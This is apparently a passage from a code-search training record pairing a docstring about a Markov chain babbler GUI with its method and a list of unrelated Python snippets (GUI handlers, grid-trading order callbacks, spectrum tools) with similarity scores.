int(spn_seg[_entry].get())\n\n if len(set(new_order)) != len(available_segments):\n messagebox.showerror('Warning',\n 'Invalid order. Repeated index.')\n elif max(new_order, key=int) != max(available_segments) or \\\n min(new_order, key=int) != min(available_segments):\n messagebox.showerror('Warning',\n 'Invalid order. Bad max/min index.')\n else:\n self.controller.shared_data.obj_track.change_order(new_order)\n top.destroy()\n\n plots.update_plots(\n self.controller.shared_data.obj_track,\n self.controller.shared_data.ax_track,\n self.controller.shared_data.ax_ele,\n self.controller.shared_data.ax_track_info,\n canvas=self.controller.shared_data.canvas)\n\n self.controller.shared_data.canvas.draw()\n\n btn_clear = tk.Button(master=frm_button, text='Clear',\n command=_clear_box)\n btn_submit = tk.Button(master=frm_button, text='Submit',\n command=_insert_order)\n btn_clear.pack(side=tk.RIGHT, padx=10)\n btn_submit.pack(side=tk.RIGHT, padx=10)",
"def on_order(self, order: OrderData):\n self.position_calculator.update_position(order)\n\n self.current_pos = self.position_calculator.pos\n self.avg_price = self.position_calculator.avg_price\n\n if order.status == Status.ALLTRADED and order.vt_orderid in (self.long_orders + self.short_orders):\n\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n\n if order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n\n self.last_filled_order = order\n\n for ids in (self.long_orders + self.short_orders + self.profit_orders):\n self.cancel_order(ids)\n\n if abs(self.position_calculator.pos) < self.fixed_size:\n return\n\n step = self.get_step()\n\n # tick 存在且仓位数量还没有达到设置的最大值.\n if self.tick and abs(self.position_calculator.pos) < self.max_pos_size * self.fixed_size:\n buy_price = order.price - step * self.grid_step\n sell_price = order.price + step * self.grid_step\n\n buy_price = min(self.tick.bid_price_1 * (1 - 0.0001), buy_price)\n sell_price = max(self.tick.ask_price_1 * (1 + 0.0001), sell_price)\n\n long_ids = self.buy(buy_price, self.fixed_size)\n short_ids = self.sell(sell_price, self.fixed_size)\n\n self.long_orders.extend(long_ids)\n self.short_orders.extend(short_ids)\n\n if order.status == Status.ALLTRADED and order.vt_orderid in self.profit_orders:\n self.profit_orders.remove(order.vt_orderid)\n if abs(self.position_calculator.pos) < self.fixed_size:\n self.cancel_all()\n\n if not order.is_active():\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.profit_orders:\n self.profit_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.stop_orders:\n self.stop_orders.remove(order.vt_orderid)\n\n self.put_event()",
"def update_order_index(self, index=None):\n if index is None:\n index = getattr(self, \"current_order_index\", 0)\n\n session = self.parent.session\n self.current_order_index = index\n self.current_order \\\n = session.input_spectra[self.current_order_index].copy()\n\n # Apply any RV correction.\n try:\n v = session.metadata[\"rv\"][\"rv_applied\"]\n except (AttributeError, KeyError):\n v = 0\n\n self.current_order._dispersion *= (1 - v/c)\n\n # Update the view if the input settings don't match the settings used\n # to normalize the current order.\n self.check_for_different_input_settings()\n\n return None",
"def reorder(self, new_order):\n #TODO doesn't work probably CRA 3/2019\n for field in [\"atoms\", \"xyz\"]:\n self.__dict__[field] = self.__dict__[field][list(new_order)]\n self.atoms = [self.atoms[i] for i in new_order]",
"def SetOrder(self, order):\n if self.__order != order:\n self.__order = order\n self.Modified()",
"def clicked_checkbox_continuum_2(self):\n if self.checkbox_continuum_2.isChecked():\n self.combo_continuum_2.setEnabled(True)\n self.update_continuum_order()\n self.edit_manual_continuum.setEnabled(False)\n else:\n self._get_selected_model().metadata[\"continuum_order\"] = -1\n self.combo_continuum_2.setEnabled(False)\n self.edit_manual_continuum.setEnabled(True)\n return None",
"def _ensure_order_consistent(self):\r\n if self.order_sum() != self.order_triangle() or \\\r\n self.force_reset_order is True:\r\n self._reset_order()\r\n self._have_reset_order = True\r\n else:\r\n self._have_reset_order = False\r\n return self._have_reset_order",
"def set_order(self, order):\n self.order = order",
"def set_order(self, order):\n self.order = order",
"def setOrder(self, verbose = 1):\n\n self.order = np.arange(self.atoms.shape[0])\n if verbose > 0:\n string = \"Updated the saved order\"\n ut.infoPrint(string)",
"def onOrderSelected(self, item):\n if self.lstOrders.getMultiSelectedItems() == []:\n self.clearBidData()\n else:\n self.btnCancelOrder.enable()",
"def check_fit_gui(wls,fxc,trans):\n\n\n import sys\n import matplotlib.pyplot as plt\n from matplotlib.widgets import Slider, Button, RadioButtons, CheckButtons\n import lib.functions as fun\n import numpy as np\n\n M = molecfit_gui(wls,fxc,trans)\n\n #The slider to cycle through orders:\n rax_slider = plt.axes([0.8, 0.2, 0.1, 0.02])\n rax_slider.set_title('Order')\n M.spectrum_slider = Slider(rax_slider,'', 0,M.N-1,valinit=0,valstep=1)#Store the slider in the model class\n M.spectrum_slider.on_changed(M.slide_spectrum)\n\n #The Previous order button:\n rax_prev = plt.axes([0.8, 0.1, 0.04, 0.05])\n bprev = Button(rax_prev, ' <<< ')\n bprev.on_clicked(M.previous)\n\n #The Next order button:\n rax_next = plt.axes([0.86, 0.1, 0.04, 0.05])\n bnext = Button(rax_next, ' >>> ')\n bnext.on_clicked(M.next)\n\n #The save button:\n rax_save = plt.axes([0.92, 0.1, 0.07, 0.05])\n bsave = Button(rax_save, 'Continue')\n bsave.on_clicked(M.save)\n\n #The cancel button:\n rax_cancel = plt.axes([0.92, 0.025, 0.07, 0.05])\n bcancel = Button(rax_cancel, 'Cancel')\n bcancel.on_clicked(M.cancel)\n\n #This is to rescale the x-size of the checkboxes so that they are squares.\n bbox = M.fig.get_window_extent().transformed(M.fig.dpi_scale_trans.inverted())\n width, height = bbox.width*M.fig.dpi, bbox.height*M.fig.dpi\n\n\n M.selec=plt.axes([0.05,0.03,0.7,0.05*M.nrows])\n M.selec.spines['bottom'].set_color('white')\n M.selec.spines['top'].set_color('white')\n M.selec.spines['left'].set_color('white')\n M.selec.spines['right'].set_color('white')\n vlines = fun.findgen(M.N-1)+0.5\n\n row = M.nrows\n offset = 0\n for i in range(M.N):\n #print(i,float(i)-offset)\n\n if float(i)-offset > M.maxboxes-1.0:\n row -= 1\n offset += M.maxboxes\n M.selec.plot(float(i)-offset+np.array([-0.5,-0.5,0.5,0.5,-0.5]),[row,row-1,row-1,row,row],color='black')\n M.selec.text(float(i)-offset,row-0.5,'%s' % i,color='black',horizontalalignment='center',verticalalignment='center')\n\n\n\n M.selec.set_xlim(-0.55,M.maxboxes-1.0+0.55)#A little margin to make sure that the line thickness is included.\n M.selec.set_ylim(-0.05,1.0*M.nrows+0.05)\n #M.selec.set_yticklabels([])\n M.selec.xaxis.set_tick_params(labelsize=8)\n M.selec.yaxis.set_tick_params(labelsize=8)\n\n\n\n def select_spectrum_box(event):\n\n #This handles with a mouseclick in either of the three plots while in add mode.\n if event.inaxes in [M.selec]:#Check that it occurs in one of the subplots.\n cc = event.xdata*1.0#xdata is the column that is selected.\n cr = event.ydata*1.0\n spectrum = np.round(cc)+np.round((M.nrows-cr-0.5))*M.maxboxes\n if spectrum < M.N:\n if spectrum in M.selected:\n M.selected.remove(spectrum)\n print('---Removed spectrum %s from manual' % spectrum)\n else:\n M.selected.append(spectrum)\n print('---Added spectrum %s to manual' % spectrum)\n M.draw_crosses()\n M.click_connector = M.fig.canvas.mpl_connect('button_press_event',select_spectrum_box)#This is the connector that registers clicks\n\n plt.show()\n print('Closed GUI, returning.')\n return(M.selected)",
"def on_order(self, order: OrderData):\n\n if order.vt_orderid not in (self.short_orders + self.long_orders):\n return\n\n self.pos_calculator.update_position(order)\n\n self.current_pos = self.pos_calculator.pos\n self.avg_price = self.pos_calculator.avg_price\n\n if order.status == Status.ALLTRADED:\n\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n self.trade_count += 1\n\n short_price = order.price + self.step_price\n if short_price <= self.high_price:\n orders = self.short(short_price, self.order_volume)\n self.short_orders.extend(orders)\n\n if len(self.long_orders) < self.max_open_orders:\n long_price = order.price - self.step_price * self.max_open_orders\n if long_price >= self.low_price:\n orders = self.buy(long_price, self.order_volume)\n self.long_orders.extend(orders)\n\n if order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n self.trade_count += 1\n long_price = order.price - self.step_price\n if long_price >= self.low_price:\n orders = self.buy(long_price, self.order_volume)\n self.long_orders.extend(orders)\n\n if len(self.short_orders) < self.max_open_orders:\n short_price = order.price + self.step_price * self.max_open_orders\n if short_price <= self.high_price:\n orders = self.short(short_price, self.order_volume)\n self.short_orders.extend(orders)\n\n if not order.is_active():\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n\n self.put_event()",
"def on_increased_position(self, order) -> None:\n pass",
"def order_information(self):\n info_ordering = MeldaInfoOrdering(self.args, self.content_selector.selected_content)\n self.content_selector.selected_content = info_ordering.run_cohesion_gradient(self.documents)",
"def clicked_checkbox_continuum(self):\n if self.checkbox_continuum.isChecked():\n self.combo_continuum.setEnabled(True)\n self.update_continuum_order()\n else:\n self._get_selected_model().metadata[\"continuum_order\"] = -1\n self.combo_continuum.setEnabled(False)\n return None",
"def setOrder(self, order):\n\t\tself.orderInData = order",
"def order(self, order):\n self._order = order",
"def calculate(self, order):\n pass",
"def change(self):\r\n\r\n # If checkboxes are available, check status and set boat speed reference line visibility accordingly.\r\n if self.cb:\r\n if self.cb_bt.checkState() == QtCore.Qt.Checked:\r\n for item in self.bt:\r\n item.set_visible(True)\r\n else:\r\n for item in self.bt:\r\n item.set_visible(False)\r\n # GGA\r\n if self.cb_gga.checkState() == QtCore.Qt.Checked:\r\n for item in self.gga:\r\n item.set_visible(True)\r\n # self.gga[0].set_visible(True)\r\n elif self.gga is not None:\r\n for item in self.gga:\r\n item.set_visible(False)\r\n # self.gga[0].set_visible(False)\r\n # VTG\r\n if self.cb_vtg.checkState() == QtCore.Qt.Checked:\r\n for item in self.vtg:\r\n item.set_visible(True)\r\n # self.vtg[0].set_visible(True)\r\n elif self.vtg is not None:\r\n for item in self.vtg:\r\n item.set_visible(False)\r\n # self.vtg[0].set_visible(False)\r\n\r\n # Draw canvas\r\n self.canvas.draw()"
] |
[
"0.6389229",
"0.58652914",
"0.5861863",
"0.5853997",
"0.5796275",
"0.5780696",
"0.5687923",
"0.5687923",
"0.55883986",
"0.5557497",
"0.55573565",
"0.55556",
"0.52876484",
"0.52418035",
"0.5234506",
"0.5224273",
"0.52146053",
"0.517181",
"0.517181",
"0.5164182",
"0.51192427",
"0.511682",
"0.51103604",
"0.5099788",
"0.5056568",
"0.5051751",
"0.5043224",
"0.50050855",
"0.5001655",
"0.49936745"
] |
0.78417915
|
0
|
Has this GUI's Markov Chain recompute itself to work with whole words.
|
def set_markov_chain_to_words(self):
    self.markov_chain.recompute_markov_chain_with_words()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def recompute_markov_chain(self):\n new_order = int(self.order_selection.get())\n if new_order != self.markov_chain.order:\n self.markov_chain.recompute_markov_chain(new_order)",
"def set_markov_chain_to_chars(self):\n self.markov_chain.recompute_markov_chain_with_chars()",
"def knowledge_refresh(self):\n knowledge_len = len(self.knowledge)\n for i, sentence in enumerate(deepcopy(self.knowledge)):\n if sentence.cells != set():\n for j in range(i+1, knowledge_len):\n if self.knowledge[j].cells != set() and sentence.cells != self.knowledge[j].cells:\n if sentence.cells.issubset(self.knowledge[j].cells):\n new_set = self.knowledge[j].cells.difference(sentence.cells)\n new_count = self.knowledge[j].count - sentence.count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n\n elif self.knowledge[j].cells.issubset(sentence.cells):\n new_set = sentence.cells.difference(self.knowledge[j].cells)\n new_count = sentence.count - self.knowledge[j].count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n \n # remove unnecessery knowledge\n if sentence.cells == set() and sentence.known_mines() == set() and sentence.known_safes() == set():\n self.knowledge.remove(sentence)",
"def get_words(self):\n wordlist = self.words_box.get().split()\n for word in wordlist:\n self.words[word] = False\n self.logic.set_words_to_find(self.words)",
"def add_knowledge(self, cell, count):\n self.moves_made.add(cell)\n self.mark_safe(cell)\n cells=set()\n #print(\"yo\")\n for i in range(cell[0]-1, cell[0]+2):\n for j in range(cell[1]-1, cell[1]+2):\n if i>=0 and j>=0 and i<self.height and j<self.width:\n if (i,j)==cell:\n continue\n if (i,j) in self.mines:\n count=count-1\n\n elif (i,j) not in self.safes and (i,j) not in self.moves_made:\n cells.add((i,j))\n\n a=Sentence(cells, count)\n r=len(self.knowledge)\n #print(\"go\")\n '''Ignore this code\n while i<r:\n if self.knowledge[i].getcells().issubset(a.cells):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n a=Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount())\n if cells.issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-cells, self.knowledge[i].getcount()-count)\n i+=1\n '''\n self.knowledge.append(a)\n #print(\"no\")\n r=range(len(self.knowledge))\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n r=range(len(self.knowledge))\n\n for i in r:\n for j in range(i+1, len(self.knowledge)):\n if self.knowledge[i].getcells().issubset(self.knowledge[j].getcells()):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n self.knowledge[j]=Sentence(self.knowledge[j].getcells()-self.knowledge[i].getcells(), self.knowledge[j].getcount()-self.knowledge[i].getcount())\n elif self.knowledge[j].getcells().issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-self.knowledge[j].getcells(), self.knowledge[i].getcount()-self.knowledge[j].getcount())\n\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_mines()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n #print(\"mines\",len(self.mines))\n \n #raise NotImplementedError",
"def reveal(self):\n self._words_guessed = self._words",
"def lemmatize_fun(self):\n tokens = str(self.doc).split()\n cleaned_tokens = None\n if self.lemmatize_method == 'wordnet':\n cleaned_tokens = [self.lemmatizer.lemmatize(token) for token in tokens]\n else:\n cleaned_tokens = [self.lemmatizer.stem(token) for token in tokens]\n \n self.doc = ' '.join(cleaned_tokens)",
"def add_knowledge(self, cell, count):\n # First, just update some basic information\n self.moves_made.add(cell)\n self.mark_safe(cell)\n # Getting the neighbouring cells\n cells = set([])\n for i in range(cell[0] - 1, cell[0] + 2):\n for j in range(cell[1] - 1, cell[1] + 2):\n\n # Ignore the cell itself\n if (i, j) == cell:\n continue\n\n # Update count if cell in bounds and is mine\n if 0 <= i < self.height and 0 <= j < self.width:\n cells.add((i,j))\n # Make sure to eliminate the known safes\n sentence = Sentence(cells - self.safes, count)\n # As well as the known mines\n for mine in self.mines:\n sentence.mark_mine(mine)\n\n # Then the knowledge base is updated\n self.knowledge.append(sentence)\n #for sentence in self.knowledge:\n #print(sentence)\n\n # Now I update the ai's knowledge until no new knowledge is made\n # First I'll check if the sentence is empty, and remove if it is\n count = 1\n # Repeat until no new changes\n while count:\n count = 0\n to_be_removed = set()\n # update any known safes or mines\n self.check_all_mines_safes()\n # Compare every pair of sentence in knowledge that is not empty\n for i in range(len(self.knowledge)):\n for j in range(i + 1, len(self.knowledge)):\n # Now I'll compare knowledge of sentence in i and j\n sentence1 = self.knowledge[i]\n sentence2 = self.knowledge[j]\n\n # First, I check if they are empty\n if sentence1.cells == set():\n to_be_removed.add(i)\n #print('first is empty')\n break\n if sentence2.cells == set():\n to_be_removed.add(j)\n #print('second is empty')\n continue\n # Or equal to each other,\n # Then I remove the sentences\n if sentence1 == sentence2:\n to_be_removed.add(j)\n #print('same')\n continue\n\n # Start to compare using information from cs50\n # The superset will be replaced with newer sentence which is smaller.\n if sentence1.cells.issubset(sentence2.cells):\n # remove the larger set\n to_be_removed.add(j)\n self.knowledge.append(Sentence(sentence2.cells - sentence1.cells, sentence2.count - sentence1.count))\n count += 1\n #print('sentence 1 is subset of sentence 2')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n elif sentence2.cells.issubset(sentence1.cells):\n to_be_removed.add(i)\n self.knowledge.append(Sentence(sentence1.cells - sentence2.cells, sentence1.count - sentence2.count))\n count += 1\n #print('sentence 2 is subset of sentence 1')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n # Now I remove the unnecessary sentences from knowledge\n # From largest\n for index in sorted(list(to_be_removed))[::-1]:\n self.knowledge.pop(index)",
"def isWordSet(self):\n return len(self.getWord()) != 0",
"def setWordKnown(self):\n self.wordKnown = ''.join(['_ ' if w not in self.guessedRight else w for w in self.getWord()])",
"def clean_duplicate_words(words):\n clean_words = []\n state = np.ones(len(words))\n while state.any():\n base_idx = state.nonzero()[0][0]\n for idx in range(len(words)):\n base_word = words[base_idx]\n new_word = words[idx]\n\n # if 2 different words (both still viable) intersect\n if idx != base_idx and state[idx] and \\\n CharNetRunner._do_words_intersect(base_word, new_word):\n # decide if to keep left/right word\n if base_word.text_score > new_word.text_score:\n state[idx] = False\n else:\n state[base_idx] = False\n break\n\n # if all other intersections were less accurate\n if state[base_idx]:\n clean_words.append(words[base_idx])\n state[base_idx] = False\n return clean_words",
"def propose(self):\n\n\n fb = 0.0\n changed_any = False\n\n while not changed_any:\n new = copy(self) ## Now we just copy the whole thing\n\n for w in self.all_words():\n if flip(self.propose_p):\n try:\n xp, xfb = self.get_word(w).propose()\n\n changed_any = True\n new.set_word(w, xp)\n fb += xfb\n\n except ProposalFailedException:\n pass\n\n\n return new, fb",
"def process(self, message, **kwargs):\n\n spc = SpellChecker()\n res = word_tokenize(message.text)\n [print(\"before -> \", word) for word in res]\n\n new_words = []\n for word in res:\n new_words.append(spc.correction(word))\n [print(\"after -> \", spc.correction(word)) for word in res]\n\n message.text = untokenize(new_words)\n message.set(\"text\", message.text, True)\n print(\"The corrected sentence -> \", untokenize(new_words))",
"def get_related_words(initial_words, model):\n \n unseen = initial_words\n \n seen = defaultdict(int)\n \n max_size = 1000 # could be greater\n \n while unseen and len(seen) < max_size:\n if len(seen) % 50 == 0: \n print('seen length : {}'.format(len(seen)))\n \n node = unseen.pop(0)\n \n new_expanding = [w for w, s in model.most_similar(node, topn=20)]\n \n unseen += new_expanding\n \n seen[node] += 1\n \n # optimal: 1. score function could be revised\n # optimal: 2. using dymanic programming to reduce computing time\n \n return seen",
"def get_related_words(initial_words, model):\n \n unseen = initial_words\n \n seen = defaultdict(int)\n \n max_size = 1000 # could be greater\n \n while unseen and len(seen) < max_size:\n if len(seen) % 50 == 0: \n print('seen length : {}'.format(len(seen)))\n \n node = unseen.pop(0)\n \n new_expanding = [w for w, s in model.most_similar(node, topn=20)]\n \n unseen += new_expanding\n \n seen[node] += 1\n \n # optimal: 1. score function could be revised\n # optimal: 2. using dymanic programming to reduce computing time\n \n return seen",
"def __spellCheck(self):\n aw = self.activeWindow()\n if aw:\n aw.checkSpelling()",
"def keep_words(self, idx):\n print('{} words have been removed'.format(self.data.shape[1] - len(idx)))\n self.data = self.data[:, idx]\n self.vocab = [self.vocab[i] for i in idx]",
"def validate_words(self):\n if not self.words or not self.mnemonic.check(self.words):\n raise InvalidWords",
"def getWord(self, input_sentence, prev_word = None):\n\n all_words = torch.zeros(0, dtype=torch.long)\n all_probs = torch.zeros(0, dtype=torch.float32)\n\n for i in range(15):\n observe_word = input_sentence[i]\n words, probs = self.factors[i].observe(observe_word)\n probs *= self.weights[i]\n\n # join factors\n all_words, idx = torch.unique(torch.cat((all_words, words)), return_inverse = True)\n concat_probs = torch.cat((all_probs, probs))\n new_probs = torch.zeros_like(all_words, dtype=torch.float32)\n\n for j in range(concat_probs.size(0)):\n new_probs[idx[j]] += concat_probs[j]\n all_probs = new_probs\n\n\n if torch.is_tensor(prev_word):\n words, probs = self.transition.observe(prev_word)\n # join factors\n all_words, idx = torch.unique(torch.cat((all_words, words)), return_inverse = True)\n concat_probs = torch.cat((all_probs, probs))\n new_probs = torch.zeros_like(all_words, dtype=torch.float32)\n for j in range(concat_probs.size(0)):\n new_probs[idx[j]] += concat_probs[j]\n all_probs = new_probs\n\n # now all_words and all_probs contains all posible words with its probability\n try:\n chosen_idx = torch.argmax(all_probs)\n result = all_words[chosen_idx]\n if int(result) == UNK_ID:\n all_probs[chosen_idx] = 0\n chosen_idx = torch.argmax(all_probs)\n result = all_words[chosen_idx]\n _, idxx = torch.sort(all_probs, descending=False)\n print(all_probs[idxx[:10]])\n print(all_words[idxx[:10]])\n print(result)\n except:\n result = input_sentence[self.output_idx]\n\n \n \n return result",
"def save(self, *args, **kwargs):\n good_list = []\n for word in self.words.lower().split('\\n'):\n word = word.strip()\n if word and word not in good_list:\n good_list.append(word)\n self.words = '\\n'.join(good_list)\n return super(WordSet, self).save(*args, **kwargs)",
"def _warm_cache(self):\n for word, index in self.word_to_index.items():\n self.embedding_layer.weight.data[index].copy_(torch.from_numpy(self.embedder.get_word_vector(word)))",
"def filterPossibleWords(self): \r\n filledInSpaces = []\r\n for i in range(len(self.currentBoard)):\r\n if self.currentBoard[i] != '_':\r\n filledInSpaces.append( (i, self.currentBoard[i]) )\r\n \r\n self.wordList = list(filter(lambda word: self.viableWord(word, filledInSpaces), self.wordList))",
"def solve(self):\n \n self.action_button.config(state = DISABLED)\n \n self.get_grid()\n resultdict = self.logic.solve()\n for word in resultdict:\n if resultdict[word]:\n self.word_search_grid[resultdict[word][0]][resultdict[word][1]].entry[\"fg\"] = \"red\"",
"def _add_text(self, elem):\n words = WORD_SEPARATORS.split(elem.string.lower())\n for word in words:\n word = word.strip()\n if word in self._ignored_words:\n continue\n self._curr_words.append((self.word_id(word), self._font_size))\n\n \"\"\" Update inverted index \"\"\"\n if self.word_id(word) in self._inverted_index:\n self._inverted_index[self.word_id(word)].add(self._curr_doc_id)\n self._resolved_inverted_index[word].add(self._curr_url)\n\n else:\n self._inverted_index[self.word_id(word)] = {self._curr_doc_id}\n self._resolved_inverted_index[word] = {self._curr_url}",
"def computeTF(self):\n for word in self.dictionary:\n self.dictionary[word].setTF(self.getTotalTerms())",
"def this_word(self):\n self.append = self.add_to_current_word",
"def isGoalState(self, state):\n wds = get_words(state)\n # checks if every word in corpus - USELESS/Possible damage\n # for i in range(len(wds)):\n # if (self.bigramCost(wds[i], self.not_word) >= self.threshold):\n # return False\n for i in range(len(wds)):\n if (wds[i] not in self.fills[i]):\n return False\n return True",
"def constitute_word_dict(self):\r\n\r\n #IS THIS NECESSARY WITH DATABASE??\r\n\r\n if self.using_shelf:\r\n for k_temp in self.get_words():\r\n self.delete_word(k_temp)\r\n\r\n for i_temp in [a_temp for a_temp in self.indexes()\r\n if Index(a_temp) > Index(str(0))]:\r\n\r\n self.add_search_words(Index(i_temp),\r\n self.get_text_from_note(i_temp))\r\n display.noteprint((alerts.ATTENTION,\r\n alerts.WORD_DICT_CONSTITUTED))",
"def word_length_check(self):\r\n \r\n for word in self.all_words:\r\n if len(word) == len(self.best_guess):\r\n self.valid_words.add(word)",
"def add_knowledge(self, cell, count):\n \n self.moves_made.add(cell)\n\n # Marking a cell safe\n\n if cell not in self.safes: \n self.mark_safe(cell)\n\n \n # Getting all nearby cells\n\n nearby = self.nearby_cells(cell) \n\n nearby -= self.safes | self.moves_made \n\n new_sentence = Sentence(nearby, count)\n\n self.knowledge.append(new_sentence)\n\n new_safes = set()\n new_mines = set()\n\n for sentence in self.knowledge:\n \n if len(sentence.cells) == 0:\n self.knowledge.remove(sentence)\n \n else:\n tmp_new_safes = sentence.known_safes()\n tmp_new_mines = sentence.known_mines()\n\n \n if type(tmp_new_safes) is set:\n new_safes |= tmp_new_safes\n\n \n if type(tmp_new_mines) is set:\n new_mines |= tmp_new_mines\n\n \n for safe in new_safes:\n self.mark_safe(safe)\n\n \n for mine in new_mines:\n self.mark_mine(mine)\n\n \n\n prev_sentence = new_sentence\n\n new_inferences = []\n\n for sentence in self.knowledge:\n if len(sentence.cells) == 0:\n self.knowledge.remove(sentence)\n\n elif prev_sentence == sentence:\n break\n elif prev_sentence.cells <= sentence.cells:\n inf_cells = sentence.cells - prev_sentence.cells\n inf_count = sentence.count - prev_sentence.count\n\n new_inferences.append(Sentence(inf_cells, inf_count))\n\n prev_sentence = sentence\n\n self.knowledge += new_inferences"
] |
[
"0.6143838",
"0.5924507",
"0.5841545",
"0.56694335",
"0.5658453",
"0.56565875",
"0.5607831",
"0.55883926",
"0.55284345",
"0.54901344",
"0.5477555",
"0.54664123",
"0.54603267",
"0.54457223",
"0.54457223",
"0.54229975",
"0.5419326",
"0.5410536",
"0.54028875",
"0.5382244",
"0.5360501",
"0.53305423",
"0.53219754",
"0.5304177",
"0.52965087",
"0.5291152",
"0.52773964",
"0.5266801",
"0.52645624",
"0.52557635"
] |
0.7139649
|
0
|
Has this GUI's Markov Chain recompute itself to work with individual characters.
|
def set_markov_chain_to_chars(self):
self.markov_chain.recompute_markov_chain_with_chars()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def recompute_markov_chain(self):\n new_order = int(self.order_selection.get())\n if new_order != self.markov_chain.order:\n self.markov_chain.recompute_markov_chain(new_order)",
"def set_markov_chain_to_words(self):\n self.markov_chain.recompute_markov_chain_with_words()",
"def _apply_character_maskings(self):\n for permutation in self.permutations:\n for char_symbol in self.characters.keys():\n for i in permutation.find_all(\"character-link\", ref=char_symbol): \n i.string.replace_with(self.characters[char_symbol])\n\n self.plain_text = \" \".join([permuation.description.text for permuation in self.permutations])\n self.reapply_plain_text_editing()",
"def redo_possibles(self):\n self.remove_possibles()\n self.set_possible()\n self.show_possibles()",
"def retranslate(self):\r\n pass",
"def retranslate(self):\r\n pass",
"def reconChar(PiksList, high):\n position, h=PiksList[0]\n NewPiksList=[]\n \n for piks in PiksList: ##delete all pixels that can not be in tile\n if piks[0]<position+high-1:\n NewPiksList.append(piks)\n \n PiksList=NewPiksList\n \n Char=CharFrame(high,high) ##create new CharFrame object \n for el in PiksList: \n Char.putPixel(el[0]-position,el[1])\n CharScaled=Char\n CharScaled.reScale(30,30) ##skale CharFrame object to the ending size\n return PiksList, CharScaled\n ##this is not testet yet because of not working neuralNetwork\n \"\"\"if CharScaled.getOutput():\n return PiksList, CharScaled\n else:\n prop=[[],[],[]]\n histo=Char.vLinesHistogram()\n for i in range(0, len(histo)):\n if histo[i]<=3:\n prop[histo[i]-1].append(i)\n for proposition in prop:\n proposition.reverse()\n CharPro=copy.deepcopy(Char)\n PiksListPro=copy.deepcopy(PiksList)\n for kolumn in proposition:\n for el in PiksList: #jeśli nie wymyślimy efektywniejszego sposobu\n if el[1]>=proposition:\n CharPro.makeWhite(position-el[0],el[1])\n PiksListPro.remove(el)\n CharProScaled=copy.deepcopy(CharPro)\n CharProScaled.reScale(20,20)\n if CharProScaled.getOutput():\n return PiksListPro, CharProSlaled\n return PiksList, Char # gdyby to nić nie dało by zwrócić cokolwiek\"\"\"",
"def __init__(self, master):\n self.master = master\n self.master.resizable(False, False)\n self.master.title('Markov Babbler')\n self.markov_chain = mc.MarkovChain()\n\n # Constants\n self.button_height = 2\n self.button_width = 21\n self.button_off_color = 'Light Grey'\n self.button_on_color = 'Dark Grey'\n self.button_column_span = 2\n self.spinbox_length = 3\n self.number_of_sentences = 12\n self.options_column = 11\n self.min_sentence_length = 10\n self.max_sentence_length = 20\n\n # Displays babbler's output\n self.display_frame = tk.Frame(master)\n self.display_frame.grid(row=0, rowspan=12, column=0, columnspan=10)\n\n self.display_scrollbar = tk.Scrollbar(self.display_frame)\n\n self.display = tk.Text(self.display_frame, height=18, width=80, bg='WHITE', borderwidth=3,\n relief=\"groove\", wrap='word')\n self.display.config(yscrollcommand=self.display_scrollbar.set)\n self.display_scrollbar.config(command=self.display.yview)\n self.display.pack(side='left')\n self.display_scrollbar.pack(side='right', fill='y')\n\n # Selects .txt file to add to this window's Markov Chain\n self.select_file = tk.Button(master, text='Add File', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.find_file)\n self.select_file.grid(row=0, column=self.options_column, columnspan=self.button_column_span)\n\n # Adds user entered text to this Markov Chain\n self.user_string_row = 1\n\n self.user_string_entry = tk.Entry(self.master)\n self.user_string_entry.insert(0, 'Add text here!')\n self.user_string_entry.grid(row=self.user_string_row, column=self.options_column)\n\n self.user_string_button = tk.Button(self.master, text='Enter', bg=self.button_off_color,\n activebackground=self.button_on_color, command=self.add_user_text)\n self.user_string_button.grid(row=self.user_string_row, column=self.options_column+1)\n\n # Changes the Markov Chains's order\n self.order_row = 2\n self.order_selection_label = tk.Label(master, text='Markov Chain Order')\n self.order_selection_label.grid(row=self.order_row, column=self.options_column)\n\n 